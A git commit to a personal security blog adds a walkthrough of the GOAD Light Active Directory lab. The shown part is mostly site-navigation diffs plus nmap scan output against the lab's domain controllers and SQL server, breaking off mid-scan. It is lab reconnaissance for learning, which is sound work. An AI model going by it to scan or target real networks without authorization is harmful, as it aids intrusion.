From 0c7b8054dc74f70bca689bdc764297f2ae80d552 Mon Sep 17 00:00:00 2001 
From: f0rk3b0mb Date: Fri, 8 Nov 2024 15:19:16 +0300 Subject: [PATCH] goad light --- 404.html | 2 +- archives/index.html | 24 + categories/htb-boxes/index.html | 14 +- categories/index.html | 53 +- categories/index.xml | 10 +- categories/labs/index.html | 464 +++++ categories/labs/index.xml | 1643 +++++++++++++++++ categories/labs/page/1/index.html | 10 + categories/page/2/index.html | 132 +- categories/reads/index.html | 33 +- categories/reads/index.xml | 612 ------ categories/thm--boxes/index.html | 14 +- categories/thm-boxes/index.html | 14 +- categories/writeups/index.html | 14 +- categories/writeups/page/2/index.html | 14 +- categories/writeups/page/3/index.html | 14 +- .../WhatsApp Image 2024-11-08 at .jpeg | Bin 0 -> 147779 bytes .../WhatsApp Image 2024-11-08 at 1.jpeg | Bin 0 -> 304873 bytes .../WhatsApp Image 2024-11-08 at 15.02..jpeg | Bin 0 -> 96252 bytes ...WhatsApp Image 2024-11-08 at 15.02.19.jpeg | Bin 0 -> 47896 bytes ...WhatsApp Image 2024-11-08 at 15.02.21.jpeg | Bin 0 -> 141224 bytes images/goad_light/admin.jpeg | Bin 0 -> 63849 bytes images/goad_light/hash.jpeg | Bin 0 -> 96252 bytes images/goad_light/print.jpeg | Bin 0 -> 141224 bytes images/goad_light/privesc.jpeg | Bin 0 -> 69294 bytes images/goad_light/sq;_shell.jpeg | Bin 0 -> 304873 bytes images/goad_light/web.jpeg | Bin 0 -> 47896 bytes images/goad_light/web_shell.jpeg | Bin 0 -> 147779 bytes images/goad_light/winrm.jpeg | Bin 0 -> 313320 bytes index.html | 82 +- index.xml | 1022 +++++++++- p/goad-light/index.html | 1621 ++++++++++++++++ p/goad-minilab-walkthrough/index.html | 957 ++++++++++ p/packet-analysis-using-wireshark/index.html | 19 - p/soc_analyst_lab/index.html | 73 +- p/windows-events-and-log-analysis/index.html | 19 - .../index.html | 19 - .../index.html | 19 - page/2/index.html | 74 +- page/3/index.html | 100 +- page/4/index.html | 78 +- page/5/index.html | 94 +- page/6/index.html | 89 +- page/index.html | 14 +- post/index.html | 44 +- post/index.xml | 1022 +++++++++- 
post/page/2/index.html | 50 +- post/page/3/index.html | 50 +- post/page/4/index.html | 50 +- post/page/5/index.html | 50 +- post/page/6/index.html | 33 +- search/index.json | 2 +- sitemap.xml | 22 +- tags/index.html | 14 +- 54 files changed, 7426 insertions(+), 1258 deletions(-) create mode 100644 categories/labs/index.html create mode 100644 categories/labs/index.xml create mode 100644 categories/labs/page/1/index.html create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at .jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 1.jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 15.02..jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 15.02.19.jpeg create mode 100644 images/goad_light/WhatsApp Image 2024-11-08 at 15.02.21.jpeg create mode 100644 images/goad_light/admin.jpeg create mode 100644 images/goad_light/hash.jpeg create mode 100644 images/goad_light/print.jpeg create mode 100644 images/goad_light/privesc.jpeg create mode 100644 images/goad_light/sq;_shell.jpeg create mode 100644 images/goad_light/web.jpeg create mode 100644 images/goad_light/web_shell.jpeg create mode 100644 images/goad_light/winrm.jpeg create mode 100644 p/goad-light/index.html create mode 100644 p/goad-minilab-walkthrough/index.html diff --git a/404.html b/404.html index 2874c76..87766cf 100644 --- a/404.html +++ b/404.html @@ -10,7 +10,7 @@ - + diff --git a/archives/index.html b/archives/index.html index d5ee5a6..210649f 100644 --- a/archives/index.html +++ b/archives/index.html @@ -272,6 +272,19 @@

Categories

+ + + +
@@ -351,6 +364,17 @@

Thm Boxes

2024

+ +
diff --git a/categories/htb-boxes/index.html b/categories/htb-boxes/index.html index 97dc026..c19c25e 100644 --- a/categories/htb-boxes/index.html +++ b/categories/htb-boxes/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs diff --git a/categories/index.html b/categories/index.html index d55a70f..37fdcc2 100644 --- a/categories/index.html +++ b/categories/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

5 pages

+

6 pages

Categories

@@ -392,6 +396,17 @@

Categories

+ + - -
+ +
@@ -461,9 +465,9 @@

@@ -611,9 +615,9 @@

- + - Featured image of post Knightctf_2024 + Featured image of post Soc_analyst_lab
@@ -623,8 +627,8 @@

@@ -632,7 +636,7 @@

- Knightctf_2024 + Soc_analyst_lab

@@ -654,7 +658,7 @@

- +

@@ -669,7 +673,7 @@

@@ -686,9 +690,9 @@

- + - Featured image of post Irisctf_whats_my_password + Featured image of post Knightctf_2024
@@ -707,7 +711,7 @@

- Irisctf_whats_my_password + Knightctf_2024

@@ -729,7 +733,7 @@

- +

@@ -744,7 +748,7 @@

diff --git a/page/3/index.html b/page/3/index.html index ed7e2c4..e277826 100644 --- a/page/3/index.html +++ b/page/3/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11 @@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,15 +387,31 @@

Categories

-
+ -
+
-
- - - Featured image of post Thm_splunk - - -
-
- -

- Thm_splunk + Htb Sherlock Meerkat

@@ -488,7 +492,7 @@

- +

@@ -503,7 +507,7 @@

@@ -520,9 +524,9 @@

- + - Featured image of post Thm_wazuh + Featured image of post Thm_splunk
@@ -532,8 +536,8 @@

@@ -541,7 +545,7 @@

- Thm_wazuh + Thm_splunk

@@ -563,7 +567,7 @@

- +

@@ -595,9 +599,9 @@

- + - Featured image of post Hack_the_boo2023 + Featured image of post Thm_wazuh
@@ -607,8 +611,8 @@

@@ -616,7 +620,7 @@

- Hack_the_boo2023 + Thm_wazuh

@@ -638,7 +642,7 @@

- +

@@ -670,9 +674,9 @@

- + - Featured image of post Thm_owasp + Featured image of post Hack_the_boo2023
@@ -682,8 +686,8 @@

@@ -691,7 +695,7 @@

- Thm_owasp + Hack_the_boo2023

@@ -713,7 +717,7 @@

- +

@@ -728,7 +732,7 @@

diff --git a/page/4/index.html b/page/4/index.html index c9ea5c2..7d04df3 100644 --- a/page/4/index.html +++ b/page/4/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11 @@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -386,9 +390,9 @@

Categories

- + - Featured image of post Blackhat_mea_2023 + Featured image of post Thm_owasp
@@ -398,8 +402,8 @@

Categories

@@ -407,7 +411,7 @@

Categories

- Blackhat_mea_2023 + Thm_owasp

@@ -429,7 +433,7 @@

- +

@@ -444,7 +448,7 @@

@@ -461,9 +465,9 @@

- + - Featured image of post Shehacks_intrervasity_2023 + Featured image of post Blackhat_mea_2023
@@ -482,7 +486,7 @@

- Shehacks_intrervasity_2023 + Blackhat_mea_2023

@@ -504,7 +508,7 @@

- +

@@ -519,7 +523,7 @@

@@ -536,9 +540,9 @@

- + - Featured image of post Windows events and log analysis + Featured image of post Shehacks_intrervasity_2023
@@ -548,8 +552,8 @@

@@ -557,7 +561,7 @@

- Windows events and log analysis + Shehacks_intrervasity_2023

@@ -579,7 +583,7 @@

- +

@@ -611,9 +615,9 @@

- + - Featured image of post ImaginaryCTF2023 + Featured image of post Windows events and log analysis
@@ -623,8 +627,8 @@

@@ -632,7 +636,7 @@

- ImaginaryCTF2023 + Windows events and log analysis

@@ -654,7 +658,7 @@

- +

@@ -669,7 +673,7 @@

@@ -686,9 +690,9 @@

- + - Featured image of post Packet analysis using Wireshark + Featured image of post ImaginaryCTF2023
@@ -698,8 +702,8 @@

@@ -707,7 +711,7 @@

- Packet analysis using Wireshark + ImaginaryCTF2023

@@ -729,7 +733,7 @@

- +

@@ -744,7 +748,7 @@

diff --git a/page/5/index.html b/page/5/index.html index a472488..1cab280 100644 --- a/page/5/index.html +++ b/page/5/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11 @@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,15 +387,23 @@

Categories

-
+ -
+
-
- - - Featured image of post HTB PC - - -
-
@@ -474,7 +478,7 @@

- HTB PC + Nahamcon2023

@@ -496,7 +500,7 @@

- +

@@ -511,7 +515,7 @@

@@ -528,9 +532,9 @@

-
+ -
+
-
- - - Featured image of post htb cyberapocalypse 2023 - - -
-
@@ -691,7 +695,7 @@

- htb cyberapocalypse 2023 + Bic winter con 2023

diff --git a/page/6/index.html b/page/6/index.html index 5bdf835..8b2e5fa 100644 --- a/page/6/index.html +++ b/page/6/index.html @@ -11,7 +11,7 @@ - + @@ -311,7 +311,7 @@

Archives

2024 - 10 + 11
@@ -350,12 +350,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,6 +387,81 @@

Categories

+ + +
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs @@ -383,7 +387,7 @@

-

26 pages

+

27 pages

Posts

@@ -392,6 +396,17 @@

Posts

+ + - - diff --git a/post/index.xml b/post/index.xml index f35ee1d..a96fb3b 100644 --- a/post/index.xml +++ b/post/index.xml 
@@ -6,7 +6,1027 @@ Recent content in Posts on f0rk3b0mb Hugo -- gohugo.io en - Sat, 26 Oct 2024 17:13:14 +0300 + Fri, 08 Nov 2024 14:33:30 +0300 + GOAD LIGHT + https://f0rk3b0mb.github.io/p/goad-light/ + Fri, 08 Nov 2024 14:33:30 +0300 + + https://f0rk3b0mb.github.io/p/goad-light/ + <p>Walkthrough of Active Directory Lab Goad-Light. Check it out &raquo; <a class="link" href="https://github.com/Orange-Cyberdefense/GOAD" target="_blank" rel="noopener" + >here</a></p> +<h3 id="port-scan">Port Scan +</h3><hr> +<p>192.168.0.150</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span><span class="lnt">25 +</span><span class="lnt">26 +</span><span class="lnt">27 +</span><span class="lnt">28 +</span><span class="lnt">29 +</span><span class="lnt">30 +</span><span class="lnt">31 +</span><span class="lnt">32 +</span><span class="lnt">33 +</span><span class="lnt">34 +</span><span class="lnt">35 +</span><span class="lnt">36 +</span><span class="lnt">37 +</span><span class="lnt">38 +</span><span class="lnt">39 +</span><span class="lnt">40 +</span><span class="lnt">41 +</span><span class="lnt">42 +</span><span class="lnt">43 +</span><span class="lnt">44 +</span><span class="lnt">45 +</span><span class="lnt">46 
+</span><span class="lnt">47 +</span><span class="lnt">48 +</span><span class="lnt">49 +</span><span class="lnt">50 +</span><span class="lnt">51 +</span><span class="lnt">52 +</span><span class="lnt">53 +</span><span class="lnt">54 +</span><span class="lnt">55 +</span><span class="lnt">56 +</span><span class="lnt">57 +</span><span class="lnt">58 +</span><span class="lnt">59 +</span><span class="lnt">60 +</span><span class="lnt">61 +</span><span class="lnt">62 +</span><span class="lnt">63 +</span><span class="lnt">64 +</span><span class="lnt">65 +</span><span class="lnt">66 +</span><span class="lnt">67 +</span><span class="lnt">68 +</span><span class="lnt">69 +</span><span class="lnt">70 +</span><span class="lnt">71 +</span><span class="lnt">72 +</span><span class="lnt">73 +</span><span class="lnt">74 +</span><span class="lnt">75 +</span><span class="lnt">76 +</span><span class="lnt">77 +</span><span class="lnt">78 +</span><span class="lnt">79 +</span><span class="lnt">80 +</span><span class="lnt">81 +</span><span class="lnt">82 +</span><span class="lnt">83 +</span><span class="lnt">84 +</span><span class="lnt">85 +</span><span class="lnt">86 +</span><span class="lnt">87 +</span><span class="lnt">88 +</span><span class="lnt">89 +</span><span class="lnt">90 +</span><span class="lnt">91 +</span><span class="lnt">92 +</span><span class="lnt">93 +</span><span class="lnt">94 +</span><span class="lnt">95 +</span><span class="lnt">96 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION +</span></span><span class="line"><span class="cl">80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +</span></span><span class="line"><span class="cl">| http-methods: +</span></span><span class="line"><span class="cl">| Supported Methods: OPTIONS TRACE GET HEAD POST +</span></span><span class="line"><span class="cl">|_ Potentially risky 
methods: TRACE +</span></span><span class="line"><span class="cl">|_http-server-header: Microsoft-IIS/10.0 +</span></span><span class="line"><span class="cl">|_http-title: IIS Windows Server +</span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:27:08Z) +</span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC +</span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn +</span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? +</span></span><span class="line"><span class="cl">464/tcp open kpasswd5? 
+</span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +</span></span><span class="line"><span class="cl">636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. 
+</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=SEVENKINGDOMS-CA +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T09:42:05 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-11-07T09:42:05 
+</span></span><span class="line"><span class="cl">| MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 +</span></span><span class="line"><span class="cl">|_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">3389/tcp open ssl/ms-wbt-server? +</span></span><span class="line"><span class="cl">| rdp-ntlm-info: +</span></span><span class="line"><span class="cl">| Target_Name: SEVENKINGDOMS +</span></span><span class="line"><span class="cl">| NetBIOS_Domain_Name: SEVENKINGDOMS +</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: KINGSLANDING +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">|_ System_Time: 2024-11-07T16:28:09+00:00 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. 
+</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Issuer: commonName=kingslanding.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Public Key type: rsa +</span></span><span class="line"><span class="cl">| Public Key bits: 2048 +</span></span><span class="line"><span class="cl">| Signature Algorithm: sha256WithRSAEncryption +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-06T09:02:59 +</span></span><span class="line"><span class="cl">| Not valid after: 2025-05-08T09:02:59 +</span></span><span class="line"><span class="cl">| MD5: d9ec:f182:4515:44a8:0935:5d95:3c86:dd98 +</span></span><span class="line"><span class="cl">|_SHA-1: 00ad:2903:56a1:7c6a:b16c:bd2d:a7c0:c6fb:4edb:e2e9 +</span></span><span class="line"><span class="cl">Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">Host script results: +</span></span><span class="line"><span class="cl">| nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) +</span></span><span class="line"><span class="cl">| Names: +</span></span><span class="line"><span class="cl">| KINGSLANDING&lt;00&gt; Flags: &lt;unique&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">| SEVENKINGDOMS&lt;00&gt; Flags: &lt;group&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">| SEVENKINGDOMS&lt;1c&gt; Flags: &lt;group&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">|_ KINGSLANDING&lt;20&gt; Flags: &lt;unique&gt;&lt;active&gt; +</span></span><span class="line"><span class="cl">| smb2-time: +</span></span><span class="line"><span class="cl">| date: 2024-11-07T16:28:09 +</span></span><span class="line"><span class="cl">|_ 
start_date: N/A +</span></span><span class="line"><span class="cl">| smb2-security-mode: +</span></span><span class="line"><span class="cl">| 3:1:1: +</span></span><span class="line"><span class="cl">|_ Message signing enabled and required +</span></span><span class="line"><span class="cl">|_clock-skew: mean: -1s, deviation: 0s, median: -1s +</span></span></code></pre></td></tr></table> +</div> +</div><p>192.168.0.151</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span><span class="lnt">25 +</span><span class="lnt">26 +</span><span class="lnt">27 +</span><span class="lnt">28 +</span><span class="lnt">29 +</span><span class="lnt">30 +</span><span class="lnt">31 +</span><span class="lnt">32 +</span><span class="lnt">33 +</span><span class="lnt">34 +</span><span class="lnt">35 +</span><span class="lnt">36 +</span><span class="lnt">37 +</span><span class="lnt">38 +</span><span class="lnt">39 +</span><span class="lnt">40 +</span><span class="lnt">41 +</span><span class="lnt">42 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION +</span></span><span 
class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:30:04Z) +</span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC +</span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn +</span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T11:44:09 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-11-07T11:44:09 +</span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? +</span></span><span class="line"><span class="cl">464/tcp open kpasswd5? 
+</span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 +</span></span><span class="line"><span class="cl">636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-07T11:44:09 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-11-07T11:44:09 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:30:52+00:00; -1s from scanner time. +</span></span><span class="line"><span class="cl">3389/tcp open ms-wbt-server? +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. 
+</span></span><span class="line"><span class="cl">| rdp-ntlm-info: +</span></span><span class="line"><span class="cl">| Target_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Domain_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: WINTERFELL +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">|_ System_Time: 2024-11-07T16:30:48+00:00 +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-06T09:17:34 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-05-08T09:17:34 +</span></span><span class="line"><span class="cl">Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">Host script results: +</span></span><span class="line"><span class="cl">|_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) +</span></span><span class="line"><span class="cl">| smb2-time: +</span></span><span class="line"><span class="cl">| date: 2024-11-07T16:30:47 +</span></span><span class="line"><span class="cl">|_ start_date: N/A +</span></span><span class="line"><span class="cl">| smb2-security-mode: +</span></span><span class="line"><span class="cl">| 3:1:1: +</span></span><span class="line"><span class="cl">|_ Message signing enabled and required +</span></span></code></pre></td></tr></table> +</div> +</div><p>192.168.0.152</p> +<div class="highlight"><div class="chroma"> +<table 
class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span><span class="lnt">25 +</span><span class="lnt">26 +</span><span class="lnt">27 +</span><span class="lnt">28 +</span><span class="lnt">29 +</span><span class="lnt">30 +</span><span class="lnt">31 +</span><span class="lnt">32 +</span><span class="lnt">33 +</span><span class="lnt">34 +</span><span class="lnt">35 +</span><span class="lnt">36 +</span><span class="lnt">37 +</span><span class="lnt">38 +</span><span class="lnt">39 +</span><span class="lnt">40 +</span><span class="lnt">41 +</span><span class="lnt">42 +</span><span class="lnt">43 +</span><span class="lnt">44 +</span><span class="lnt">45 +</span><span class="lnt">46 +</span><span class="lnt">47 +</span><span class="lnt">48 +</span><span class="lnt">49 +</span><span class="lnt">50 +</span><span class="lnt">51 +</span><span class="lnt">52 +</span><span class="lnt">53 +</span><span class="lnt">54 +</span><span class="lnt">55 +</span><span class="lnt">56 +</span><span class="lnt">57 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">PORT STATE SERVICE VERSION +</span></span><span class="line"><span class="cl">80/tcp open http Microsoft 
IIS httpd 10.0 +</span></span><span class="line"><span class="cl">|_http-server-header: Microsoft-IIS/10.0 +</span></span><span class="line"><span class="cl">| http-methods: +</span></span><span class="line"><span class="cl">|_ Potentially risky methods: TRACE +</span></span><span class="line"><span class="cl">|_http-title: Site doesn&#39;t have a title (text/html). +</span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC +</span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn +</span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? +</span></span><span class="line"><span class="cl">1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM +</span></span><span class="line"><span class="cl">| ms-sql-ntlm-info: +</span></span><span class="line"><span class="cl">| 192.168.0.152:1433: +</span></span><span class="line"><span class="cl">| Target_Name: NORTH +</span></span><span 